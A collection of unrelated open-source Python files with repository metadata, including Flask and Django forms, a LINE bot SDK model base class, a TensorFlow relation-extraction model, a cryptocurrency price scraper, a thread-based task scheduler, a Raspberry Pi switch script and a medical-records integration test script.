/wcics/server/forms/forms/admin/topics/create.py
|
f6fdf0312231da71bbd9d63bced8582cbde4eebd
|
[
"MIT"
] |
permissive
|
CS-Center/CS-Center
|
042b74e1c1b829a241260159ee40bf9ffa5a7027
|
3cd09f29d214406e6618fc67b9faf59a18f3f11b
|
refs/heads/master
| 2021-07-03T00:12:38.569492
| 2020-09-16T20:38:39
| 2020-09-16T20:38:39
| 209,430,258
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 418
|
py
|
# -*- coding: utf-8 -*-
from wcics.server.forms.validator_sets import *
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField, TextAreaField
class TopicSudoCreateForm(FlaskForm):
tid = StringField("ID", admin_topic_create_tid)
name = StringField("Name", admin_topic_create_name)
description = TextAreaField("Description", admin_topic_create_description)
submit = SubmitField("Create")
|
[
"keenan@cscenter.ca"
] |
keenan@cscenter.ca
|
c08ce6dd49ab813444d35c3c9349c72f052e228b
|
5e255ad1360c90478393744586663741a9569c21
|
/linebot/models/base.py
|
164fca9d9e9240236cfe90b9b6b2b37ba835814f
|
[
"Apache-2.0"
] |
permissive
|
line/line-bot-sdk-python
|
d76268e8b542060d6eccbacc5dbfab16960ecc35
|
cffd35948238ae24982173e30b1ea1e595bbefd9
|
refs/heads/master
| 2023-08-31T22:12:31.698183
| 2023-08-28T01:10:09
| 2023-08-28T01:10:09
| 70,553,423
| 1,898
| 1,181
|
Apache-2.0
| 2023-09-11T05:14:07
| 2016-10-11T03:42:26
|
Python
|
UTF-8
|
Python
| false
| false
| 4,121
|
py
|
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""linebot.models.base module."""
import json
from .. import utils
class Base(object):
"""Base class of model.
Suitable for JSON base data.
"""
def __init__(self, **kwargs):
"""__init__ method.
:param kwargs:
"""
pass
def __str__(self):
"""__str__ method."""
return self.as_json_string()
def __repr__(self):
"""__repr__ method."""
return str(self)
def __eq__(self, other):
"""__eq__ method.
:param other:
"""
return other and self.as_json_dict() == other.as_json_dict()
def __ne__(self, other):
"""__ne__ method.
:param other:
"""
return not self.__eq__(other)
def as_json_string(self):
"""Return JSON string from this object.
:rtype: str
"""
return json.dumps(self.as_json_dict(), sort_keys=True)
def as_json_dict(self):
"""Return dictionary from this object.
:return: dict
"""
data = {}
for key, value in self.__dict__.items():
camel_key = utils.to_camel_case(key)
if isinstance(value, (list, tuple, set)):
data[camel_key] = list()
for item in value:
if hasattr(item, 'as_json_dict'):
data[camel_key].append(item.as_json_dict())
else:
data[camel_key].append(item)
elif hasattr(value, 'as_json_dict'):
data[camel_key] = value.as_json_dict()
elif value is not None:
data[camel_key] = value
return data
@classmethod
def new_from_json_dict(cls, data, use_raw_message=False):
"""Create a new instance from a dict.
:param data: JSON dict
:param bool use_raw_message: Using original Message key as attribute
"""
if use_raw_message:
return cls(use_raw_message=use_raw_message, **data)
new_data = {utils.to_snake_case(key): value
for key, value in data.items()}
return cls(**new_data)
@staticmethod
def get_or_new_from_json_dict(data, cls):
"""Get `cls` object w/ deserialization from json if needed.
If data is instance of cls, return data.
Else if data is instance of dict, create instance from dict.
Else, return None.
:param data:
:param cls:
:rtype: object
"""
if isinstance(data, cls):
return data
elif isinstance(data, dict):
return cls.new_from_json_dict(data)
return None
@staticmethod
def get_or_new_from_json_dict_with_types(
data, cls_map, type_key='type', use_raw_message=False
):
"""Get `cls` object w/ deserialization from json by using type key hint if needed.
If data is instance of one of cls, return data.
Else if data is instance of dict, create instance from dict.
Else, return None.
:param data:
:param cls_map:
:param type_key:
:rtype: object
:param bool use_raw_message: Using original Message key as attribute
"""
if isinstance(data, tuple(cls_map.values())):
return data
elif isinstance(data, dict):
type_val = data[type_key]
if type_val in cls_map:
return cls_map[type_val].new_from_json_dict(data, use_raw_message=use_raw_message)
return None
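# --- Illustrative usage sketch (editor's addition, not part of the SDK file).
# ProfileDemo is a hypothetical subclass; only Base and its methods above are
# real. It shows the snake_case <-> camelCase round trip the class provides.
from linebot.models.base import Base

class ProfileDemo(Base):
    def __init__(self, display_name=None, user_id=None, **kwargs):
        super(ProfileDemo, self).__init__(**kwargs)
        self.display_name = display_name  # serialized as "displayName"
        self.user_id = user_id            # serialized as "userId"

p = ProfileDemo(display_name='Alice', user_id='U123')
print(p.as_json_string())  # {"displayName": "Alice", "userId": "U123"}
q = ProfileDemo.new_from_json_dict({'displayName': 'Alice', 'userId': 'U123'})
print(p == q)  # True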
|
[
"noreply@github.com"
] |
noreply@github.com
|
0e0fbfff7cc2527f4cf77872685c1eba72a8441b
|
368f19de1a70535f3938da92d7278c0296a1b142
|
/fb/manage.py
|
fa01778819c491bc93750de929e949753879bf33
|
[] |
no_license
|
viveksoundrapandi/chrome-aldown
|
82a5f3c679108a146f0c9fd76d8809b868a2933b
|
7a1915534ed90bc647e9775178a6f16a7be8e7a1
|
refs/heads/master
| 2022-11-05T02:12:32.272354
| 2022-10-07T11:29:36
| 2022-10-07T11:29:36
| 5,950,897
| 0
| 1
| null | 2022-10-07T11:29:37
| 2012-09-25T14:03:40
|
Python
|
UTF-8
|
Python
| false
| false
| 245
|
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "fb.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
[
"vivekhas3@gmail.com"
] |
vivekhas3@gmail.com
|
1db2de63ecb9a8bd60c598385a262b6e2b0785b9
|
a20f8ae0c129927318792ec4547d534dbe38871a
|
/model/pcnn_att_adam.py
|
053182fb9d612e4235924547884f5d4eb3d5a2cb
|
[
"MIT"
] |
permissive
|
zhaohuiqiang/ONRE
|
dbc82abc31271c690252d3f2f5cf799c5f871f83
|
736fc5ff6f12be590d02cb66abb82c1616e1327c
|
refs/heads/master
| 2020-03-31T17:14:35.197909
| 2018-11-20T01:00:47
| 2018-11-20T01:00:47
| 152,414,099
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,028
|
py
|
from framework import Framework
import tensorflow as tf
FLAGS = tf.app.flags.FLAGS
def pcnn_att_adam(is_training):
if is_training:
framework = Framework(is_training=True)
else:
framework = Framework(is_training=False)
word_embedding = framework.embedding.word_embedding()
pos_embedding = framework.embedding.pos_embedding()
embedding = framework.embedding.concat_embedding(word_embedding, pos_embedding)
x = framework.encoder.pcnn(embedding, FLAGS.hidden_size, framework.mask, activation=tf.nn.relu)
logit, repre = framework.selector.attention(x, framework.scope, framework.label_for_select)
if is_training:
loss = framework.classifier.softmax_cross_entropy(logit)
        # the original line was `output = output(logit)`, which calls an undefined
        # name; mirror the test branch below and use the softmax probabilities
        output = tf.nn.softmax(logit)
framework.init_train_model(loss, output, optimizer=tf.train.AdamOptimizer)
framework.load_train_data()
framework.train()
else:
framework.init_test_model(tf.nn.softmax(logit))
framework.load_test_data()
framework.test()
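# --- Editor's sketch (assumption-laden): the module above expects the
# surrounding framework to define FLAGS.hidden_size. Under TF1 that is
# typically done once at startup, e.g. (the value 230 is illustrative):
# tf.app.flags.DEFINE_integer('hidden_size', 230, 'PCNN hidden size')
# pcnn_att_adam(is_training=True)   # train; pass False to run the test path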
|
[
"346091714@qq.com"
] |
346091714@qq.com
|
dd169cb46861b1832b662aacb471b515ebccff0e
|
afeed161a0bd0e92cdcfcf3c580db8f78719bae8
|
/Milestone_One/bs4_scrape.py
|
9fd1671a4ae3045c68b4492451484a6c4a36dccb
|
[] |
no_license
|
changjung1995/WQD7005_Data_Mining
|
07046b0c8088123c29c0a0eb65126570515b291d
|
3e214835ff527b6e3d2fefa442efae4c60ae527a
|
refs/heads/master
| 2023-05-27T15:10:29.562769
| 2020-06-20T06:46:01
| 2020-06-20T06:46:01
| 246,978,227
| 0
| 1
| null | 2023-05-22T22:45:37
| 2020-03-13T03:11:35
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 2,317
|
py
|
# -*- coding: utf-8 -*-
"""
@author: Tan Chang Jung & Tan Sia Hong
"""
#%%
import requests
from bs4 import BeautifulSoup
from datetime import date
import time
import pandas as pd
#%%
headers = {'User-Agent' : 'Chrome/74.0.3729.169'}
# select the top 20 from the ranking of cryptocurrencies
cryptocurrency = ['bitcoin','ethereum','xrp','bitcoin-cash','tether',
'bitcoin-sv','litecoin','eos','binance-coin','neo',
'chainlink','cardano','stellar','tron','unus-sed-leo',
'monero','huobi-token','ethereum-classic','crypto-com-coin',
'dash']
#%%
# capture today date
today = date.today().strftime("%Y%m%d")
# format the base url link
base_url = 'https://coinmarketcap.com/currencies/{}/historical-data/?start=20100101&end=' + today
# header
heading = ['Date', 'Open', 'High', 'Low', 'Close', 'Volume', 'Market Capacity']
for cc in cryptocurrency:
url = base_url.format(cc)
response = requests.get(url, headers = headers)
soup = BeautifulSoup(response.content, 'html.parser')
#find html code for table
table = soup.find_all('div', class_='cmc-table__table-wrapper-outer')
table = table[2]
data = []
for rows in table.find_all('tr'):
row = {}
for cols, head in zip(rows.find_all('td'), heading):
row[head] = cols.text.replace('\n','').strip()
data.append(row)
time.sleep(5)
df = pd.DataFrame(data)
df = df.drop(df.index[0]) # remove empty row
df["Date"] = pd.to_datetime(df["Date"]).dt.strftime('%Y-%m-%d')
    # strip the thousands separators and cast every numeric column to float
    for col in ['Open', 'High', 'Low', 'Close', 'Volume', 'Market Capacity']:
        df[col] = df[col].str.replace(',', '').astype('float64').round(2)
# save to csv
df.to_csv(cc + '.csv', index = False)
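# --- Editor's aside: for static HTML tables like these, pandas can often
# parse the markup directly; a hedged alternative to the manual row walk:
# tables = pd.read_html(response.text)   # list of DataFrames, one per <table>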
|
[
"wqd190008@siswa.um.edu.my"
] |
wqd190008@siswa.um.edu.my
|
56b5c5e6c185d48ef5ff9fdb8aa7c49f34eb9f35
|
055b8c0176f9036061c9abd56e18db28eb69111f
|
/venv/bin/pip2.7
|
ff662bae4ff3be2065482ea43c0d8cb0caa9a617
|
[] |
no_license
|
patientplatypus/pythonsimpleskeleton
|
0b56cc589db7ca91ecd7160b28f3556c3e3e153b
|
8bb70d549b8c367fe39ebe73685fd765032e13f7
|
refs/heads/master
| 2021-05-12T08:38:20.330403
| 2018-01-13T21:30:34
| 2018-01-13T21:30:34
| 117,291,647
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 253
|
7
|
#!/Users/patientplatypus/Documents/python_play/venv/bin/python2.7
# -*- coding: utf-8 -*-
import re
import sys
from pip import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"pweyand@gmail.com"
] |
pweyand@gmail.com
|
038676f976925f63daee208e21804295dadcdee2
|
0581b790cf9feda6638084fca19a03137baa3ce1
|
/Tron_niezainstalowany/Setup.py
|
e06af08aadc6917f538a6f807b07a7b5e67e0520
|
[] |
no_license
|
Frax123/TRON-GAME-PYTHON
|
127eb4878093eb6419aaa3a7b051f5f54caf1343
|
2524efe0c9718d13f1cd8e74882fe316179d6d4e
|
refs/heads/master
| 2020-05-04T21:54:46.401725
| 2019-04-04T12:35:33
| 2019-04-04T12:35:33
| 179,493,063
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 374
|
py
|
# -*- coding: utf-8 -*-
import cx_Freeze
executables = [cx_Freeze.Executable('Tron.py')]
cx_Freeze.setup(name = 'Tron',
options = {'build_exe':{'packages': ['pygame'], 'include_files' : ['Red_player.png', 'Blue_player.png', 'Icon.png', 'Wybuch.png']}},
description = 'Tron: First Chapter',
executables = executables)
|
[
"noreply@github.com"
] |
noreply@github.com
|
f76d5f3aec244f5d33fcd7e2887d2eb61bb5658a
|
0b25b1c2ea3e3f05ea388e1105cd2fab50e7ba54
|
/mysite/blog/forms.py
|
68ba9afdb13950be95db2f366aa5aebf783e6d1c
|
[] |
no_license
|
webclinic017/Django-project
|
f8337aeb296d12760143951635d0297c13313a50
|
e757aef633c63aaf857afd1f274d42d16703ca0c
|
refs/heads/master
| 2022-12-25T17:30:14.503627
| 2020-10-12T08:47:08
| 2020-10-12T08:47:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 397
|
py
|
from django import forms
from .models import Comment
class EmailPostForm(forms.Form):
name = forms.CharField()
email = forms.EmailField()
to = forms.EmailField()
comments = forms.CharField(required=False,
widget=forms.Textarea)
class CommentForm(forms.ModelForm):
class Meta:
model = Comment
fields = ('name', 'email', 'body')
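# --- Editor's illustrative sketch (not in the original file): typical view-side
# use of CommentForm. The `post` foreign key on Comment is an assumption made
# for illustration; only the two form classes above come from this app.
def add_comment(request, post):
    form = CommentForm(request.POST or None)
    if form.is_valid():
        comment = form.save(commit=False)  # build the model instance, defer the DB write
        comment.post = post                # attach the assumed related post
        comment.save()
    return form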
|
[
"moreshubham203@gmail.com"
] |
moreshubham203@gmail.com
|
bd0794483225cac132025003cb18438963984fcf
|
178998aecae2aa9d52e43b702abd52fd6ba58b2b
|
/0517/defT.py
|
6a4a7b45c745ddf7f69c664c45c1027a1ac5f75a
|
[] |
no_license
|
www111111/git-new
|
34d664cad5084d9d016f25131eb0d5a8f719d7d1
|
3fd96e79b3c3a67afbc6227db1c69294f75848c0
|
refs/heads/master
| 2020-03-17T10:30:24.560482
| 2018-05-28T12:24:20
| 2018-05-28T12:24:20
| 133,514,309
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 182
|
py
|
def sum():  # note: shadows the built-in sum(); name kept from the original file
    """Read an expression of the form a + c + d from the console and return its value."""
    a = int(input('a'))
    b = input('+')
    c = int(input('c'))
    e = input('+')
    d = int(input('d'))
    if b == '+' and e == '+':
        return a + c + d
    return None  # unexpected operator: nothing to compute
|
[
"1337872746@qq.com"
] |
1337872746@qq.com
|
cc1984673c8ca18f83d4bb875b6a0454c72c78f0
|
d7bd5d5fd6114ceec28b190434958c5d3e8d0b8a
|
/install_nltk.py
|
046937c12c7ca4cddcc380ea6f28482a1457f08d
|
[] |
no_license
|
jay-cleveland/reddit_data_acquisition
|
1c2529c6063a47c163aa73449004df433f7811b0
|
c1e78b3328c87c7bff034cc63723076a7da89354
|
refs/heads/master
| 2022-10-16T08:52:12.591232
| 2022-09-30T02:08:33
| 2022-09-30T02:08:33
| 105,435,874
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 89
|
py
|
import nltk
def main():
nltk.download('punkt')
nltk.download('all-corpora')
main()
|
[
"clevelanjk18@uww.edu"
] |
clevelanjk18@uww.edu
|
241ccb6c7c4ae0c34b892c9d317fbd849d3ea4ef
|
7fba01da6426480612d7cef9ceb2e15f3df6d01c
|
/PYTHON/pythonDesafios/venv/lib/python3.9/site-packages/santos/santos.py
|
b862f2661c3fd15467cd45185f3ff2200ba50eaa
|
[
"MIT"
] |
permissive
|
Santos1000/Curso-Python
|
f320fec1e7ced4c133ade69acaa798d431e14113
|
549223a1633f6f619c87554dd8078cf7841bb1df
|
refs/heads/main
| 2023-05-26T12:01:23.868814
| 2021-05-26T13:22:58
| 2021-05-26T13:22:58
| 371,039,290
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,153
|
py
|
__author__ = 'anderson'
# -*- coding: utf-8 -*-
from threading import Thread
from datetime import datetime
from exceptions import TaskException
import logging
log = logging.getLogger(__name__)
class ControlJobs:
__jobs = []
def stop(self, jobname):
log.debug("Job name %s" % jobname)
log.debug(self.__jobs)
for idx, th in enumerate(self.__jobs):
if jobname in th:
th[jobname]._stop()
del self.__jobs[idx]
break
def addjob(self, job):
self.__jobs.append(job)
log.debug(self.__jobs)
stopjobs = ControlJobs()
class TaskScheduling(Thread):
"""
Os parâmetros aceitos são:
seconds, minutes, hour, time_of_the_day, day_of_the_week, day_of_the_month
Descrição:
O parâmetro seconds define que a função será executada repetidamente na frequência do valor passado em segundos
ex: seconds="20", será executado de 20 em 20 segundos
O parâmetro minutes define que a função será executada repetidamente na frequência do valor passado em minutos
ex: minutes="20", será executado de 20 em 20 minutos
O parâmetro hour define que a função será executada repetidamente na frequência do valor passado em horas
ex: hour="2", será executado de 2 em 2 horas
obs: Esses três parâmetros não podem ser combinados, nem entre e nem com os dois abaixo.
O parâmetro time_of_the_day define que a função será executada todo dia em um horário específico, que deve ser
passado no seguinte formato hh:mm:ss.(hh: 0..23 ; mm: 0..59, ss: 0..59)
ex: time_of_the_day="14:15:00", será executada todo dia às quartoze horas e quinze minutos
O parâmetro day_of_the_week define que a função será executada no dia da semana passado como valor.
Os valores possíveis são: Su(Sunday/Domingo), M(Monday/Segunda), Tu(Tuesday/Terça), W(Wednesday/Quarta),
Th(Thursday/Quinta), F(Friday/Sexta), Sa(Saturday/Sábado) em maiúsculo.
Tem que ser combinado com o parâmetro time_of_the_day para especificar a hora, minuto e segundo daquele
dia da semana.
ex: day_of_the_week="W" time_of_the_day="22:00:00", Será executado toda quarta às vinte e dua horas.
Exemplos de uso:
Basta decorar a função ou método da classe que se queira agendar.
@TaskScheduling(seconds="30")
def do_something(a):
print("Print do_something: %s" % a)
import time
time.sleep(6)
print("terminou do_something")
do_something()
*****************************************
class Teste(object):
@TaskScheduling(time_of_the_day="08:30:00")
def some_function(self, a):
print("Print some_function: %s" % a)
import time
print("Função some_function")
time.sleep(10)
print("terminou some_function")
obj = Teste()
obj.some_function("b")
"""
days = {"M": 0, "Tu": 1, "W": 2, "Th": 3, "F": 4, "Sa": 5, "Su": 6}
    # receives the decorator's parameters
def __init__(self, *arguments, **argumentsMap):
Thread.__init__(self)
self.args = arguments
self.argumentsMap = argumentsMap
self.threadname = argumentsMap["name"]
self.execute = False
log.debug("Arguments: %r:" % self.argumentsMap)
    # the actual decorator: it receives the decorated function; since this is a class, __call__ does the work
def __call__(self, function):
self.function = function
        # receives the decorated function's arguments
def task(*functionargs, **functionArgumentsMap):
self.functionargs = functionargs
self.functionArgumentsMap = functionArgumentsMap
stopjobs.addjob({self.threadname: self})
self.start()
return task
def run(self):
try:
log.debug("JOB RUNNING")
import time
self.execute = True
while self.execute:
interval = self.calculateInterval()
log.debug("Interval: %r in seconds" % interval)
time.sleep(interval)
self.function(*self.functionargs, **self.functionArgumentsMap)
except TaskException as t:
log.debug(t)
def _stop(self):
log.debug("STOP")
self.execute = False
return self.execute
    def calculateInterval(self):
        """
        Determines the time, in seconds, until the next task run.
        When the parameter that sets the next run time is time_of_the_day,
        the auxCalculate method is called to compute it.
        :return:
        """
        if "day_of_the_week" in self.argumentsMap:
            if "hour" in self.argumentsMap or "minutes" in self.argumentsMap or "seconds" in self.argumentsMap:
                raise TaskException("Extra parameters that cannot be combined")
            if "time_of_the_day" in self.argumentsMap:
                return self.calculateDayOfTheWeek(self.argumentsMap["day_of_the_week"],
                                                  self.argumentsMap["time_of_the_day"])
            else:
                raise TaskException("The time_of_the_day parameter is missing")
        elif "time_of_the_day" in self.argumentsMap:
            if "hour" in self.argumentsMap or "minutes" in self.argumentsMap or "seconds" in self.argumentsMap:
                raise TaskException("Extra parameters that cannot be combined")
            return self.auxCalculate(self.argumentsMap["time_of_the_day"])[0]
        elif "hour" in self.argumentsMap:
            if "seconds" in self.argumentsMap or "minutes" in self.argumentsMap:
                raise TaskException("Extra parameters that cannot be combined")
            return int(self.argumentsMap["hour"]) * 3600
        elif "minutes" in self.argumentsMap:
            if "seconds" in self.argumentsMap:
                raise TaskException("Extra parameters that cannot be combined")
            else:
                return int(self.argumentsMap["minutes"]) * 60
        elif "seconds" in self.argumentsMap:
            log.debug("seconds")
            return int(self.argumentsMap["seconds"])
        else:
            raise TaskException("Invalid parameter(s): %r" % self.argumentsMap)
    def calculateDayOfTheWeek(self, day_of_the_week, time_of_the_day):
        entrada = day_of_the_week
        weekday = datetime.now().weekday()
        dif = self.days[entrada] - weekday
        sleep, diference = self.auxCalculate(time_of_the_day)
        if self.days[entrada] == weekday:
            if diference > 0:
                return sleep
            else:
                return sleep + (6 * (24*3600))  # 24 hours in seconds
        elif self.days[entrada] > weekday:
            if diference > 0:
                return sleep + (dif * (24*3600))
            else:
                # If the target is already the next day, just return sleep: the time
                # until that day's schedule is already accounted for.
                if dif == 1:
                    return sleep
                else:
                    return sleep + ((dif-1) * (24*3600))  # 24 hours in seconds
        else:
            # number of days of difference
            resp = 7 - abs(dif)
            if diference > 0:
                return sleep + (resp * (24*3600))
            else:
                # If the target is already the next day, just return sleep: the time
                # until that day's schedule is already accounted for.
                if resp == 1:
                    return sleep
                else:
                    return sleep + ((resp-1) * (24*3600))  # 24 hours in seconds
    def auxCalculate(self, time_of_the_day):
        """
        Returns the time in seconds so that the task always runs at the chosen hour.
        :param time_of_the_day:
        :return: sleep_time
        """
        try:
            times = [3600, 60, 1]
            one_day_has = '24:00:00'.split(":")
            time_day = sum([a*b for a, b in zip(times, [int(i) for i in one_day_has])])
            aux_time = time_of_the_day.split(":")
            time_want = sum([a*b for a, b in zip(times, [int(i) for i in aux_time])])
            # convert the current time to seconds
            hjf = datetime.now().strftime("%H:%M:%S").split(":")
            now = sum([a*b for a, b in zip(times, [int(i) for i in hjf])])
            # difference between the desired time and the current time, in seconds
            diference = time_want - now
            sleep_time = None
            if diference < 0:
                # will only run on the next day
                sleep_time = time_day - (diference * (-1))
            else:
                # will still run on the same day
                sleep_time = diference
        except TaskException as t:
            log.debug(t)
        return sleep_time, diference
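# --- Editor's usage sketch: __init__ reads argumentsMap["name"], so a job
# name is required even though the docstring examples above omit it. Minimal
# scheduling plus a later stop (commented out so importing stays side-effect free):
# @TaskScheduling(seconds="10", name="heartbeat")
# def heartbeat():
#     log.debug("tick")
# heartbeat()                  # starts the thread, firing every 10 seconds
# stopjobs.stop("heartbeat")   # stops the job and unregisters it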
|
[
"83990871+Santos1000@users.noreply.github.com"
] |
83990871+Santos1000@users.noreply.github.com
|
90fcefb5891a9d1a1d6662ad1e564dc05696dc70
|
3eadfce7b2238f7d25256976e939b4d0e6c49ebb
|
/switchhello_pd.py
|
d744975e787c98bdb695c2c9c35d6bbe9cb98a3e
|
[
"BSD-2-Clause"
] |
permissive
|
kyab/kazu
|
591d3fc40a9845c9e8d6a22ae1fb1aef8a4441ba
|
9ae0c3cec8ba09770b039825d99cdc53a627b6fd
|
refs/heads/master
| 2021-01-19T04:02:07.279051
| 2016-06-24T23:40:40
| 2016-06-24T23:40:40
| 61,918,052
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 704
|
py
|
import RPi.GPIO as G
import time
import os
import signal
import sys
print "switchhello_pd started."
COUNT = 5
PIN_LED = 17
PIN_SWITCH = 27
def signal_handler(signal, frame):
G.cleanup()
print "GPIO cleanup done."
sys.exit(0)
def wait_and_shout():
G.wait_for_edge(PIN_SWITCH, G.RISING)
print "SWITCH PUSHED"
if G.input(PIN_SWITCH):
print "HIGH"
else:
print "LOW"
G.output(PIN_LED,True)
os.system("aplay -q -D hw:0 ./one.wav &")
time.sleep(0.1)
G.output(PIN_LED,False)
G.setmode(G.BCM)
G.setup(PIN_LED, G.OUT)
G.setup(PIN_SWITCH, G.IN, pull_up_down = G.PUD_DOWN)
signal.signal(signal.SIGINT, signal_handler)
while True:
try:
wait_and_shout()
except:
pass
G.cleanup()
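# --- Editor's aside (assumption, not in the original): mechanical switches
# bounce, so one press can trigger wait_for_edge repeatedly. RPi.GPIO's event
# API can filter this with a bounce window instead:
# G.add_event_detect(PIN_SWITCH, G.RISING, bouncetime=200)  # then poll G.event_detected(PIN_SWITCH)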
|
[
"kyossi212@gmail.com"
] |
kyossi212@gmail.com
|
52f20985a5f0c10e33313979e29aaeaca9acc59f
|
d806dd4a6791382813d2136283a602207fb4b43c
|
/sirius/blueprints/api/remote_service/tula/test/script.py
|
c571a235f8d6348648f5a6cb22945332ad0645a8
|
[] |
no_license
|
MarsStirner/sirius
|
5bbf2a03dafb7248db481e13aff63ff989fabbc2
|
8839460726cca080ca8549bacd3a498e519c8f96
|
refs/heads/master
| 2021-03-24T12:09:14.673193
| 2017-06-06T16:28:53
| 2017-06-06T16:28:53
| 96,042,947
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,263
|
py
|
#! coding:utf-8
"""
@author: BARS Group
@date: 25.10.2016
"""
from sirius.app import app
from sirius.blueprints.api.local_service.risar.active.test.test_data import \
get_mr_appointment_data
from sirius.blueprints.api.local_service.risar.passive.test.request import \
send_event_remote, request_local
from sirius.blueprints.api.local_service.risar.passive.test.test_data import \
get_sch_ticket_data_required, get_send_to_mis_card_data, \
get_send_to_mis_first_ticket25_data, get_send_to_mis_measures_data, \
get_send_to_mis_epicrisis_data, get_send_to_mis_second_ticket25_data, \
get_send_to_mis_pc_ticket25_data, get_send_to_mis_first_checkup_data, \
get_send_to_mis_second_checkup_data, get_send_to_mis_pc_checkup_data
from sirius.blueprints.api.remote_service.tula.passive.checkup_first_ticket25.test.request import \
edit_checkup_first_ticket25
from sirius.blueprints.api.remote_service.tula.passive.checkup_first_ticket25.test.test_data import \
get_first_ticket25_data_more
from sirius.blueprints.api.remote_service.tula.passive.childbirth.test.request import \
create_childbirth, edit_childbirth
from sirius.blueprints.api.remote_service.tula.passive.childbirth.test.test_data import \
get_childbirth_data_required, get_childbirth_data_more
from sirius.blueprints.api.remote_service.tula.passive.client.test.request import \
create_client, edit_client
from sirius.blueprints.api.remote_service.tula.passive.client.test.test_data import \
get_client_data_required, get_client_data_more
from sirius.blueprints.api.remote_service.tula.passive.doctor.test.request import \
create_doctor, edit_doctor, delete_doctor
from sirius.blueprints.api.remote_service.tula.passive.doctor.test.test_data import \
get_doctor_data_required, get_doctor_data_more
from sirius.blueprints.api.remote_service.tula.passive.hospitalization.test.request import \
create_hospitalization, edit_hospitalization
from sirius.blueprints.api.remote_service.tula.passive.hospitalization.test.test_data import \
get_meas_hosp_data_required, get_meas_hosp_data_more
from sirius.blueprints.api.remote_service.tula.passive.organization.test.request import \
create_organization, edit_organization, delete_organization
from sirius.blueprints.api.remote_service.tula.passive.organization.test.test_data import \
get_organization_data_required, get_organization_data_more
from sirius.blueprints.api.remote_service.tula.passive.research.test.request import \
create_research, edit_research
from sirius.blueprints.api.remote_service.tula.passive.research.test.test_data import \
get_meas_research_data_required, get_meas_research_data_more
from sirius.blueprints.api.remote_service.tula.passive.specialists_checkup.test.request import \
create_sp_checkup, edit_sp_checkup
from sirius.blueprints.api.remote_service.tula.passive.specialists_checkup.test.test_data import \
get_sp_checkup_data_required, get_sp_checkup_data_more
from sirius.blueprints.api.test.connect import make_login, release_token
risar_session = None
sirius_session = (None, None)
class _TestTula:
def test_mr_auth(self):
global risar_session
if risar_session:
return
with app.app_context():
with make_login() as sess:
risar_session = sess
print 'test_risar_auth', sess
def test_full_cycle(self, testapp):
ext_org_id = org_id = 111
# mis_to_mr_organisation(testapp, ext_org_id)
ext_doctor_id = doctor_id = 112
# mis_to_mr_doctor(testapp, ext_org_id, ext_doctor_id)
ext_client_id = 113
# mis_to_mr_client(testapp, ext_client_id)
client_id = 110
        sch_ticket_id = 3928  # 09:00 23.11.16 Test User (obstetrician-gynecologist)
        # create an appointment in the web UI (http://10.1.2.13:6600/patients/search/)
        # mr_to_mis_sch_ticket(testapp, org_id, doctor_id, client_id, sch_ticket_id)
        # card_id = !mr_create_card(testapp, client_id)
        card_id = 468  # create the card in the web UI # 690
        ext_card_id = 222
        # mr_to_mis_card(testapp, client_id, card_id)
        # !mr_create_first_checkup(testapp, card_id)
        first_checkup_id = 4345  # create the first checkup in the web UI
        second_checkup_id = 0  # create the second checkup in the web UI
        pc_checkup_id = 0  # create the PC checkup in the web UI
        # mr_to_mis_first_checkup(testapp, card_id, first_checkup_id)
        # mr_to_mis_first_ticket25(testapp, card_id, first_checkup_id)
        ext_first_checkup_id = 222
        # mr_to_mis_second_ticket25(testapp, card_id, second_checkup_id)
        # mr_to_mis_pc_ticket25(testapp, card_id, pc_checkup_id)
        # mr_to_mis_first_checkup(testapp, card_id, first_checkup_id)
        # mr_to_mis_second_checkup(testapp, card_id, second_checkup_id)
        # mr_to_mis_pc_checkup(testapp, card_id, pc_checkup_id)
        # create referrals in the web UI - checkup, hospitalization, examinations
# mr_to_mis_measures(testapp, card_id)
# ch_event_measure_id = 6255
# res_event_measure_id = 6258
ext_ch_event_measure_id = 117
ext_res_event_measure_id = 118
ext_sp_checkup_id = 114
# mis_to_mr_meas_sp_checkup(testapp, ext_card_id, ext_org_id, ext_doctor_id,
# ext_ch_event_measure_id, ext_sp_checkup_id)
# ext_hosp_id = 115
# mis_to_mr_meas_hosp(testapp, card_id, ext_org_id, ext_doctor_id, ext_ch_event_measure_id, ext_hosp_id)
ext_research_id = 116
# mis_to_mr_meas_research(testapp, ext_card_id, ext_org_id, ext_doctor_id,
# ext_res_event_measure_id, ext_research_id)
# mis_to_mr_first_ticket25(testapp, ext_card_id, ext_org_id, ext_doctor_id, ext_first_checkup_id)
# mis_to_mr_second_ticket25
# mis_to_mr_pc_ticket25
# mis_to_mr_childbirth(testapp, ext_card_id, ext_org_id, ext_doctor_id)
# mr_to_mis_epicrisis(testapp, card_id)
def mis_to_mr_organisation(testapp, org_id):
# create_organization(testapp, risar_session, get_organization_data_required(org_id))
# delete_organization(testapp, risar_session, org_id)
edit_organization(testapp, risar_session, org_id, get_organization_data_more(org_id))
def mis_to_mr_doctor(testapp, org_id, doctor_id):
# create_doctor(testapp, risar_session, get_doctor_data_required(org_id, doctor_id))
